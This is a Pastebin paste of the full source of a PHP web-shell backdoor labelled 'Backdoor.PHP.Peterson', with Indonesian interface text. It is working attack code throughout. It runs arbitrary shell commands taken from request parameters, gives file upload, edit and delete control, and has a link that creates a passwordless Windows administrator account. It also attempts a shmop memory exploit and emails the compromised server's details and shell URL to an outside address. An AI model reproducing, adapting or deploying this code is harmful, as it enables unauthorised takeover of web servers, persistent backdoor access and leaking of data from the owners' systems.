FlyFar

Backdoor.PHP.Peterson - Source Code

Jul 6th, 2023
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 21.67 KB | Cybersecurity | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Language" content="pt-br">
  4. <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
  5. <meta name="ProgId" content="AoD">
  6. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  7. <title>***BY PETERSON THE GREATEST CMD***</title>
  8. <style type="text/css">
  9. A:link {text-decoration:none}
  10. A:visited {text-decoration:none}
  11. A:hover {text-decoration:underline}
  12. A:active {text-decoration:underline}
  13. body,td {
  14.  font-family: verdana;
  15.  font-size: 8pt;
  16.  background-color: #FFCC00;
  17. }
  18. a{
  19.  color: #0000FF;
  20.  text-decoration: none;
  21. }
  22. a:hover {
  23.  color: #FF0000;
  24.  text-decoration: underline;
  25. }
  26. </style>
  27. </head>
  28. <body >
  29. <center><h2> --== by MS flood_  ==-- </h2></center>
  30. <?php
  31.  
  32.  @set_time_limit(0);
  33.  $string = $_SERVER['QUERY_STRING'];
  34.  $mhost = 'http://nodan.110mb.com/cmds.txt?';
  35.  $host_all = explode("$mhost", $string);
  36.  $s1 = $host_all[0];
  37.  $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
  38.  $OS = @PHP_OS;
  39.  $IpServer = '127.0.0.1';
  40.  $UNAME = @php_uname();
  41.  $PHPv = @phpversion();
  42.  $SafeMode = @ini_get('safe_mode');
  43.  if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
  44.  else { $SafeMode = "<i>$SafeMode</i>"; }
  45.  $btname = '';
  46.  $bt = '';
  47.  $dc = '';
  48.  $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup
  49. &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';
  50.  $bn = '';
  51. // Java Script
  52.  echo "<script type=\"text/javascript\">";
  53.  echo "function ChMod(chdir, file) {";
  54.  echo "var o = prompt('Chmod: - Contoh: 0777', '');";
  55.  echo "if (o) {";
  56.  echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file +
  57. '&chmod=' + o + \"\";";
  58.  echo "}";
  59.  echo "}";
  60.  echo "function Rename(chdir, file, mode) {";
  61.  echo "if (mode == 'edit') {";
  62.  echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
  63.  echo "}";
  64.  echo "else {";
  65.  echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
  66.  echo "}";
  67.  echo "if (o) {";
  68.  echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file +
  69. '&newname=' + o + '&mode=' + mode +\"\";";
  70.  echo "}";
  71.  echo "}";
  72.  echo "function Copy(chdir, file) {";
  73.  echo "var o = prompt('Copied for:', '/tmp/' + file);";
  74.  echo "if (o) {";
  75.  echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file +
  76. '&fcopy=' + o + \"\";";
  77.  echo "}";
  78.  echo "}";
  79.  echo "function Mkdir(chdir) {";
  80.  echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
  81.  echo "if (o) {";
  82.  echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o +
  83. \"\";";
  84.  echo "}";
  85.  echo "}";
  86.  echo "function Newfile(chdir) {";
  87.  echo "var o = prompt('Nama File?', 'File_Baru.txt');";
  88.  echo "if (o) {";
  89.  echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o +
  90. \"\";";
  91.  echo "}";
  92.  echo "}";
  93.  echo "</script>";
  94.  // End JavaScript
  95.  /* Functions */
  96.  function cmd($CMDs) {
  97.   $CMD[1] = '';
  98.   exec($CMDs, $CMD[1]);
  99.   if (empty($CMD[1])) {
  100.    $CMD[1] = shell_exec($CMDs);
  101.   }
  102.    elseif (empty($CMD[1])) {
  103.    $CMD[1] = passthru($CMDs);
  104.   }
  105.   elseif (empty($CMD[1])) {
  106.    $CMD[1] = system($CMDs);
  107.   }
  108.   elseif (empty($CMD[1])) {
  109.    $handle = popen($CMDs, 'r');
  110.    while(!feof($handle)) {
  111.     $CMD[1][] .= fgets($handle);
  112.    }
  113.    pclose($handle);
  114.   }
  115.   return $CMD[1];
  116.  }
  117.  
  118. if (@$_GET['chdir']) {
  119.  $chdir = $_GET['chdir'];
  120. } else {
  121.    $chdir = getcwd()."/";
  122.   }
  123. if (@chdir("$chdir")) {
  124.  $msg = "<font color=\"#008000\"> Pintu Masuk ke Direktori, OK!</font>";
  125. } else {
  126.  $msg = "<font color=\"#FF0000\">Error: Gagal masukkan ke folder!</font>";
  127.  $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
  128. }
  129.  $chdir = str_replace(chr(92), chr(47), $chdir);
  130. if (@$_GET['action'] == 'upload') {
  131.  $uploaddir = $chdir;
  132.  $uploadfile = $uploaddir. $_FILES['userfile']['name'];
  133.  if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
  134. $_FILES['userfile']['name'])) {
  135.   $msg = "<font color=\"#008000\"><font
  136. color=\"#000080\">{$_FILES['userfile']['name']}</font>, Upload File Berjaya.
  137. </font>";
  138.  } else {
  139.     $msg = "<font color=\"#FF0000\">Error: Upload File Gagal.</font>";
  140.    }
  141. }
  142. elseif (@$_GET['action'] == 'mkdir') {
  143.     $newdir = $_GET['newdir'];
  144.     if (@mkdir("$chdir"."$newdir")) {
  145.      $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, folder
  146. berhasil dibuat. </font>";
  147.     } else {
  148.        $msg = "<font color=\"#FF0000\">Error: Pembuatan folder gagal.</font>";
  149.       }
  150. }
  151. elseif (@$_GET['action'] == 'newfile') {
  152.     $newfile = $_GET['newfile'];
  153.     if (@touch("$chdir"."$newfile")) {
  154.      $msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, berhasil
  155. dibuat! </font>";
  156.     } else {
  157.        $msg = "<font color=\"#FF0000\">Error: Tak Boleh Buat File!</font>";
  158.       }
  159. }
  160. elseif (@$_GET['action'] == 'del') {
  161.      $file = $_GET['file']; $type = $_GET['type'];
  162.      if ($type == 'file') {
  163.       if (@unlink("$chdir"."$file")) {
  164.        $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
  165. menghapus arsip (file)!</font>";
  166.       } else {
  167.          $msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan File (file)!</font>";
  168.         }
  169.      } elseif ($type == 'dir') {
  170.         if (@rmdir("$chdir"."$file")) {
  171.           $msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, Berhasil
  172. menghapus folder!</font>";
  173.         } else {
  174.            $msg = "<font color=\"#FF0000\">Error: Gagal menghapuskan folder!</font>";
  175.           }
  176.        }
  177. }
  178. elseif (@$_GET['action'] == 'chmod') {
  179.      $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
  180.      if (@chmod ("$file", $chmod)) {
  181.  
  182.       $msg = "<font color=\"#008000\">Chmod dari</font> <font
  183. color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">berubah menjadi</font>
  184. <font color=\"#000080\">$chmod</font> <font color=\"#008000\">: Sukses!</font>";
  185.      } else {
  186.         $msg = '<font color=\"#FF0000\">Error: Gagal mengubah chmod.</font>';
  187.        }
  188. }
  189. elseif (@$_GET['action'] == 'rename') {
  190.      $file = $_GET['file']; $newname = $_GET['newname'];
  191.      if (@rename("$chdir"."$file", "$chdir"."$newname")) {
  192.       $msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font>
  193. <font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font
  194. color=\"#008000\">successfully!</font>";
  195.      } else {
  196.         $msg = "<font color=\"#FF0000\">Error: Gagal menukar File.</font>";
  197.        }
  198. }
  199. elseif (@$_GET['action'] == 'copy') {
  200.     $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
  201.     if (@copy("$file", "$copy")) {
  202.      $msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">disalin
  203. menjadi</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">
  204. Berhasil!</font>";
  205.     } else {
  206.        $msg = "<font color=\"#FF0000\">Error: Gagal menyalin </font> <font
  207. color=\"#000000\">{$file}</font> <font color=\"#FF0000\">menjadi</font> <font
  208. color=\"#000000\">{$copy}</font></font>";
  209.       }
  210. }
  211. /* Parte Atualiza 02:48 12/2/2006 */
  212. elseif (@$_GET['action'] == 'cmd') {
  213.  if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
  214.  if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
  215.  $cmd = stripslashes(trim($cmd));
  216.  $result_arr = cmd($cmd);
  217.  
  218.  $afim = count($result_arr); $acom = 0; $msg = '';
  219.  $msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida
  220. Console';font-size: 12px;margin 2\">Hasil : <b>".$cmd."</b></p>";
  221.  if ($result_arr) {
  222.   while ($acom <= $afim) {
  223.    $msg .= "<p style=\"color: #008000;text-align: left;font-family:
  224. 'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
  225.   $acom++;
  226.    }
  227.  }
  228.  else {
  229.   $msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida
  230. Console';font-size: 12px;margin 2\">Error: Gagal Menjalankan perintah.</p>";
  231.  }
  232. }
  233. elseif (@$_GET['action'] == 'safemode') {
  234. if (@!extension_loaded('shmop')) {
  235.  echo "Loading... module</br>";
  236.     if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
  237.         @dl('php_shmop.dll');
  238.     } else {
  239.         @dl('shmop.so');
  240.     }
  241. }
  242. if (@extension_loaded('shmop')) {
  243.  echo "Module: <b>shmop</b> loaded!</br>";
  244.  $shm_id = @shmop_open(0xff2, "c", 0644, 100);
  245.  if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
  246.  $data="\x00";
  247.  $offset=-3842685;
  248.  $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
  249.  if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of
  250. data\n"; }
  251.  if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
  252.  echo passthru("id");
  253.  shmop_close($shm_id);
  254.  
  255. } else { echo "Module: <b>shmop</b> tidak dimuat!</br>"; }
  256. }
  257. elseif (@$_GET['action'] == 'zipen') {
  258.  $file = $_GET['file'];
  259.  $zip = @zip_open("$chdir"."$file");
  260.  $msg = '';
  261. if ($zip) {
  262.     while ($zip_entry = zip_read($zip)) {
  263.         $msg .= "Name:               " . zip_entry_name($zip_entry) . "\n";
  264.         $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) . "\n";
  265.         $msg .= "Compressed Size:    " . zip_entry_compressedsize($zip_entry) . "\n";
  266.         $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
  267.         if (zip_entry_open($zip, $zip_entry, "r")) {
  268.             echo "File Contents:\n";
  269.             $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
  270.             echo "$buf\n";
  271.             zip_entry_close($zip_entry);
  272.         }
  273.         echo "\n";
  274.     }
  275.     zip_close($zip);
  276. }
  277. }
  278. elseif (@$_GET['action'] == 'edit') {
  279.  $file = $_GET['file'];
  280.  $conteudo = '';
  281.  $filename = "$chdir"."$file";
  282.  $conteudo = @file_get_contents($filename);
  283.  $conteudo = htmlspecialchars($conteudo);
  284.  $back = $_SERVER['HTTP_REFERER'];
  285.  echo "<p align=\"center\">Editing {$file} ...</p>";
  286.  echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
  287. collapse\" width=\"100%\" id=\"editacao\">";
  288.  echo "<tr>";
  289.  echo "<td width=\"100%\">";
  290.  echo "<form method=\"POST\"
  291. action=\"{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}\">";
  292.  echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\"
  293. s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
  294.  print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana;
  295. font-size: 8pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
  296.  echo "<p align=\"center\">";
  297.  echo "<input type=\"submit\" value=\"Simpan\" name=\"B2\" style=\"  border: 1px solid
  298. #000000\"> ";
  299.  echo "<input type=\"button\" value=\"Tutup\"
  300. Onclick=\"javascript:window.location='{$fstring}&amp;chdir={$chdir}'\" name=\"B1\" style=\"  
  301. border: 1px solid #000000\"> ";
  302.  echo "</form>";
  303.  echo "</td>";
  304.  echo "</tr>";
  305.  echo "</table>";
  306. }
  307. elseif (@$_GET['action'] == 'save') {
  308.    $filename = "$chdir".$_GET['file'];
  309.    $somecontent = $_POST['S1'];
  310.    $somecontent = stripslashes(trim($somecontent));
  311.    if (is_writable($filename)) {
  312.     @$handle = fopen ($filename, "w");
  313.     @$fw = fwrite($handle, $somecontent);
  314.     @fclose($handle);
  315.     if ($handle && $fw) {
  316.      $msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font
  317. color=\"#008000\">berhasil diedit!</font>";
  318.     }
  319.  } else {
  320.     $msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">tidak
  321. bisa ditulisi!</font>";
  322.    }
  323. }
  324. // Informaçs
  325.  $cmdget = '';
  326.  if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
  327.  if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
  328.  $cmdget = htmlspecialchars($cmdget);
  329.  function asdads() {
  330.   $asdads = '';
  331.   if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
  332.   if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
  333.   if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
  334.   if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
  335.   if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
  336.   return $asdads;
  337.  }
  338. echo "<form method=\"POST\" name=\"cmd\"
  339. action=\"{$fstring}&amp;action=cmd&amp;chdir=$chdir\">";
  340. echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
  341. echo "<legend>Informasi</legend>";
  342. echo "<br><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:
  343. collapse; font-family: Verdana; font-size: 10px\" width=\"100%\">";
  344. echo "<tr>";
  345. echo "<td width=\"8%\">";
  346. echo " <b>Sistem </b> </td> ";
  347. echo "<td width=\"92%\">: {$OS}</td>";
  348. echo "</tr>";
  349. echo "<tr>";
  350. echo "<td width=\"8%\">";
  351. echo " <b>Nama </b></td> ";
  352. echo "<td width=\"92%\">: {$UNAME}</td>";
  353. echo "</tr>";
  354. echo "<tr>";
  355. echo "<td width=\"8%\">";
  356. echo " <b>PHP </b></td> ";
  357. echo "<td width=\"92%\">: {$PHPv}, <b> Safe Mode :</b> {$SafeMode}</td>";
  358. echo "</tr>";
  359.  if (strtoupper(substr($OS, 0,3) != 'WIN')) {
  360.   $Methods = asdads();
  361.   if ($Methods == '') { $Methods = "???"; }
  362.   echo "<tr>";
  363.   echo "<td width=\"8%\">";
  364.   echo "<b>Methods </b></td> ";
  365.   echo "<td width=\"92%\">: {$Methods}</td>";
  366.   echo "</tr>";
  367.  }
  368. echo "<tr>";
  369. echo "<td width=\"8%\">";
  370. echo " <b>IP </b></td> ";
  371. echo "<td width=\"92%\">: {$IpServer}</td>";
  372. echo "</tr>";
  373. echo "<tr>";
  374. echo "<td width=\"8%\">";
  375. echo " <b>Perintah </b></td> ";
  376. echo "<td width=\"92%\">: <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\"
  377. style=\" font-size: 8 pt; border: 1px solid #000000\"> <input type=\"submit\"
  378. name=\"action\" value=\"Kirim\" style=\" font-size: 8 pt; border: 1px solid
  379. #000000\"></td>";
  380. echo "</tr>";
  381. echo "</table><br>";
  382. echo "</fieldset></form>";
  383. // Dir
  384. echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\"
  385. enctype=\"multipart/form-data\">";
  386. echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\"
  387. s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid
  388. #000000; padding: 2\">";
  389. if (is_writable("$chdir")) {
  390.  if (strtoupper(substr($OS, 0,3) == 'WIN')) {
  391.   echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
  392. onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
  393. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  394. href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">Remote
  395. Access</a></legend>";
  396.  } else {
  397.     echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\"
  398. onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
  399. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  400. href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">Kembali</a></legend
  401. >";
  402.    }
  403. }
  404. else {
  405. if (strtoupper(substr($OS, 0,3) == 'WIN')) {
  406.   echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
  407. onclick=\"Mkdir('{$chdir}');\">Foldr Baru</a> | <a href=\"#[New File]\"
  408. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  409. href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">Remote
  410. Access</a></legend>";
  411.  } else {
  412.     echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\"
  413. onclick=\"Mkdir('{$chdir}');\">Folder Baru</a> | <a href=\"#[New File]\"
  414. onclick=\"Newfile('{$chdir}')\">File Baru</a> | <a
  415. href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">Kembali</a></legend>
  416. ";
  417.    }
  418. }
  419. if (@!$handle = opendir("$chdir")) {
  420.  echo " Gue gak bisa masuk folder, <a href=\"{$fstring}\">Klik sini!</a> untuk Kembali ke folder ori!</br>";
  421. }
  422. else {
  423. echo "  <table border=\"0\" cellpadding=\"5\" cellspacing=\"0\" width=\"100%\">";
  424. echo "    <tr>";
  425. echo "      <td width=\"100%\" colspan=\"4\"> Upload:";
  426. echo "      <input type=\"file\" name=\"userfile\" size=\"65\" style=\"  border-style:
  427. solid; border-width: 1\">";
  428. echo "      <input type=\"submit\" value=\"Kirim\" name=\"B1\" style=\" border: 1px solid
  429. #000000\"></td>";
  430. echo "    </tr>";
  431. echo "    <tr>";
  432. echo "      <td width=\"100%\" colspan=\"4\"> </td>";
  433. echo "    </tr>";
  434. echo "    <tr>";
  435. echo "      <td width=\"100%\" colspan=\"4\">";
  436. if (@!$msg) {
  437.  echo "      <p align=\"left\">Messages</td>";
  438. } else {
  439.    echo "      <p align=\"left\">$msg</td>";
  440.   }
  441. echo "    </tr>";
  442. echo "    <tr>";
  443. echo "      <td width=\"100%\" colspan=\"4\"> </td>";
  444. echo "    </tr></table> ";
  445. echo "   <table border=\"1\" cellpadding=\"2\" cellspacing=\"0\" width=\"100%\">";
  446. echo "    <tr bgcolor=\"#FF6600\" align=\"center\"> ";
  447. echo "      <td > Permision</td>";
  448. echo "      <td > Nama File </td>";
  449. echo "      <td > Kapasiti </td>";
  450. echo "      <td > Perintah</td>";
  451. echo "     </tr>";
  452. $colorn = 0;
  453.     while (false !== ($file = readdir($handle))) {
  454.         if ($file != '.') {
  455.             if ($colorn == 0) {
  456.              $color = "style=\"background-color: #FF9900\"";
  457.             }
  458.             elseif ($colorn == 1) {
  459.              $color = "style=\"background-color:  #FFCC33\"";
  460.             }        
  461.             if (@is_dir("$chdir"."$file")) {
  462.              $file = $file.'/';
  463.              $mode = 'chdir';
  464.             } else {
  465.                $mode = 'edit';
  466.              }
  467.             if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
  468.               $chdir .= '/';
  469.             }
  470.             if ($file == '../') {
  471.              $lenpath = strlen($chdir); $baras = 0;
  472.              for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
  473.              $chdir_ = explode("/", $chdir);
  474.              $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
  475.             }
  476.             $perms = @fileperms ("$chdir"."$file");
  477.             if ($perms == '') {
  478.              $perms = '???';
  479.             }
  480.             $size = @filesize ("$chdir"."$file");
  481.             $size = $size / 1024;
  482.             $size = explode(".", $size);
  483.             if (@$size[1] != '') {
  484.              $size = $size[0].'.'.@substr("$size[1]", 0, 2);
  485.             } else {
  486.                $size = $size[0];
  487.              }
  488.             if ($size == 0) {
  489.              if ($mode == 'chdir') {
  490.               $size = '???';
  491.              }
  492.             }
  493.             echo "<tr>";
  494.      echo "<td align=\"center\" $color> $perms</td>";
  495.             if (@is_writable ("$chdir"."$file")) {
  496.              if ($mode == 'chdir') {
  497.               if ($file == '../') {
  498.                echo "<td $color> <b><a href=\"{$fstring}&amp;chdir=$chdirpox\"><font
  499. color=\"#008000\">$file</font></a></b> </td>";
  500.               } else {
  501.                  echo "<td $color> <b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\"><font
  502. color=\"#008000\">$file</font></a> </b></td>";                
  503.                 }
  504.              } else {
  505.   if (is_readable("$chdir"."$file")) {
  506.                  echo "<td $color> <a
  507. href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
  508.                 } else {
  509.                    echo "<td $color> $file </td>";
  510.                   }
  511.                }
  512.             }
  513.            else {
  514.              if ($mode == 'chdir') {
  515.               if ($file == '../') {
  516.                echo "<td $color> <a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a>
  517. </td>";
  518.               } else {
  519.                  echo "<td $color> <a
  520. href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";                
  521.                }
  522.              } else {
  523.   if (@is_readable("$chdir"."$file")) {
  524.                  echo "<td  $color> <a
  525. href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a> </td>";
  526.                 } else {
  527.                    echo "<td $color> $file</td>";
  528.                  }
  529.                }
  530.              }
  531.             echo "<td align=\"right\" $color> $size KB</td>";
  532.             if ($mode == 'edit') {
  533.              echo "<td align=\"center\" $color> <a href=\"#{$file}\"
  534. onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
  535. href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">Del</a>
  536. | <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | <a href=\"#{$file}\"
  537. onclick=\"Copy('{$chdir}', '{$file}')\">Copy</a> </td>";
  538.             } else {
  539.                echo "<td align=\"center\" $color> <a href=\"#{$file}\"
  540. onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">Rename</a> | <a
  541. href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">Del</a>
  542. | <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">Chmod</a> | Copy </td>";
  543.               }  
  544.             echo "</tr>";
  545.             if ($colorn == 0) {
  546.              $colorn = 1;
  547.             }
  548.             elseif ($colorn == 1) {
  549.              $colorn = 0;
  550.             }
  551.         }
  552.     }
  553.     closedir($handle);
  554. }
  555.   $OS = @PHP_OS;
  556.   $UNAME = @php_uname();
  557.   $PHPv = @phpversion();
  558.   $SafeMode = @ini_get('safe_mode');
  559.  
  560.   if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
  561.   else { $SafeMode = "<i>$SafeMode</i><BR>"; }
  562.  
  563.    
  564.   $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
  565.   $psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe
  566. Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan
  567. Guna Target Ini.<BR>By: MSN PEBA");
  568.  
  569.   $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n";
  570.   $header .= "MIME-Version: 1.0\r\n";
  571.   If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  572.   If ($file_name) $header .= "--$uid\r\n";
  573.   $header .= "Content-Type: text/$contenttype\r\n";
  574.   $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  575.   $header .= "$message\r\n";
  576.   If ($file_name) $header .= "--$uid\r\n";
  577.   If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  578.   If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  579.   If ($file_name) $header .= "Content-Disposition: attachment;
  580. filename=\"$file_name\"\r\n\r\n";
  581.   If ($file_name) $header .= "$content\r\n";
  582.   If ($file_name) $header .= "--$uid--";
  583.   $to = ("arms27@fdfrr.com");
  584.   $subject = ("Hajar bos");
  585.   mail($to,$subject,$psn,$header);
  586. @include "$bn";
  587. ?>
  588.   </table>
  589.   </fieldset></form>
  590. </div>
  591. </body>
  592. </html>
Tags: php Backdoor
Add Comment
Please, Sign In to add comment